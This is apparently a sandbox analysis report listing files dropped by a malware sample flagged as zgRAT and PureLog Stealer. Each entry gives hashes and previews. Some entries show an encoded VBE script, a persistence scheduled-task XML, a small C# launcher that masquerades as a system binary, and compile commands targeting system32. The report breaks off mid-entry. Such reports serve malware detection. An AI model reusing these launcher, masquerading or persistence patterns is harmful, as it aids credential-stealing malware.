                                                                  SSDEEP:24:KJfVxId3ka6KOkqeFkOfHQAEifHQPKax5DqBVKVrdFAMBJTH:unkka6NkqeFkywAEuwPK2DcVKdBJj
                                                                  MD5:B9F872918F7DD62C2DE8C98FFAD08386
                                                                  SHA1:BB77BDFB27F546902FD944C897B5634B8BE9F618
                                                                  SHA-256:9EFFDF25038B15840A8200923DAEB40DE44BA0901528B52B1A21AB473A5142EB
                                                                  SHA-512:1F849B100AE455E615A298F31EDB2F81377812E75B850D46B9161D44E74DBD6A4502420C1C85C2F3D1EF0B5C430E7CAF52072AE0DA178DFC2779359D3ADD81D9
                                                                  Malicious:false
                                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):0.08235737944063153
                                                                  Encrypted:false
                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):0.5712781801655107
                                                                  Encrypted:false
                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\svchost.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\ProgramData\svchost.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):103
                                                                  Entropy (8bit):5.031377595969092
                                                                  Encrypted:false
                                                                  SSDEEP:3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
                                                                  MD5:77218AE27E9AD896918D9A081C61B1BE
                                                                  SHA1:3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
                                                                  SHA-256:E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
                                                                  SHA-512:6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
                                                                  Malicious:true
                                                                  Preview:%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%
                                                                  Process:C:\ProgramData\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):217
                                                                  Entropy (8bit):5.712224367043722
                                                                  Encrypted:false
                                                                  SSDEEP:6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
                                                                  MD5:D6DA6166258E23C9170EE2A4FF73C725
                                                                  SHA1:C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
                                                                  SHA-256:78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
                                                                  SHA-512:37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
                                                                  Malicious:true
                                                                  Preview:#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774723
                                                                  Encrypted:false
                                                                  SSDEEP:3:dG7KAPIe:du0e
                                                                  MD5:84E03A23BF6F4DE55C26296223490E67
                                                                  SHA1:735E026D88070F7CBD3DDAF1D11A29E2492ED427
                                                                  SHA-256:492C5251C0C35ACEE30FA3DE6B53784F2AD898C0CCFA2A32B02B6F772F4030E7
                                                                  SHA-512:65DE0154DDD44925CB97CF171ADB1E33BFF5E2E6E7E49FC35342FEB6884A0D4341C93C9B5863A9EE5DCBA1E5153AF6E0583BCC2399B581AAA097C54508AA9B35
                                                                  Malicious:false
                                                                  Preview:83UT3GEA40TiMIzvotej580qD
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):0.5707520969659783
                                                                  Encrypted:false
                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.243856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:sGdSJVugJ:sXEgJ
                                                                  MD5:0E27105FCC6F955910B1CBD44ECADFEB
                                                                  SHA1:D7E5B195A2692A1C7D150537ECBEE3B29775EEB7
                                                                  SHA-256:D9BCD68C2EBC9AB29E5D3F2F6B6A95ED53EC41BC272E288AE611C0FA1578157F
                                                                  SHA-512:DB1C41BC89B4D3589AFFD51EC67F74B9371440FA02EE23780FAF18ACE344A077E668CA8BDC19FA43CEBF6952BA450B2332AF40299A7E3D2761209F4C6BF32F0C
                                                                  Malicious:false
                                                                  Preview:BEmgDprsxN7CzBEhlorqKyoAl
                                                                  Process:C:\ProgramData\setup.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):161792
                                                                  Entropy (8bit):5.8318794599287465
                                                                  Encrypted:false
                                                                  SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                  MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                  SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                  SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                  SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):14
                                                                  Entropy (8bit):3.378783493486176
                                                                  Encrypted:false
                                                                  SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                  MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                  SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                  SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                  SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                  Malicious:false
                                                                  Preview:{"Surveys":{}}
                                                                  Process:C:\ProgramData\setup.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1490
                                                                  Entropy (8bit):5.1015990235428035
                                                                  Encrypted:false
                                                                  SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                  MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                  SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                  SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                  SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):373
                                                                  Entropy (8bit):4.934382447319216
                                                                  Encrypted:false
                                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JR3RiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKH
                                                                  MD5:F3C0BE45881000BAE58A40AE20BCBBD3
                                                                  SHA1:A6396273EDE30094B5C38559C94B6328E91D3152
                                                                  SHA-256:11870F7F8AE1E8EE7B4EE21F192E6B6FA00AC21FE2CB03738A0E7ECA18F371AA
                                                                  SHA-512:539B33971F575EDF7E023AB453B4A2F437DCC598BEFA4894AE40DED589D13B7A0B8C3CF8546CA9C9D554980F307444775ADADE0846A706CCC7AAB85F03EC619E
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\HpQPPZazcv.exe"); } catch { } }).Start();. }.}.
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):250
                                                                  Entropy (8bit):5.088807837827853
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fiqBHn:Hu7L//TRq79cQWf6qxn
                                                                  MD5:5D4C090C60ACBA9A0B2B9DBFAFBF52D8
                                                                  SHA1:E4041C9035457797EF7861128FDEBAB2C6F31240
                                                                  SHA-256:E7C09BA1C63DB707CC2A446A614D429E9979458491791A54FEC37DBBCD9FE3D8
                                                                  SHA-512:5EFFB0A4099FD5FB9F6176B64DFDFD61193B5B0DA5858263F3D5F6FCFA373205285679427E0C03DE4BF1C29AFBB694F14DE60C4B128AC27963C2FBDD45D15682
                                                                  Malicious:true
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.0.cs"
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):781
                                                                  Entropy (8bit):5.265727768524531
                                                                  Encrypted:false
                                                                  SSDEEP:24:KJfC6MI/un/Vq79tWf6fKax5DqBVKVrdFAMBJTH:uCTN/VquqK2DcVKdBJj
                                                                  MD5:78CED89DD628C344A00EF81C1C63AD8F
                                                                  SHA1:9E728034855BBB160AA4E6E64B3AA5D980639B58
                                                                  SHA-256:8F690D7F4AEA4C8D8681C8C98BE89AE83900B5781389AFE3B0E9A7EA9ADEDF85
                                                                  SHA-512:43E6A2D543D88EC4B10923B0F50B423F3B1A9036D4D341600A7490AE25775C3C7EF7B170450D9556F0C369156A183DC90D3F25D10E7E352284C20DE5CE09FC32
                                                                  Malicious:false
                                                                  Preview:.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
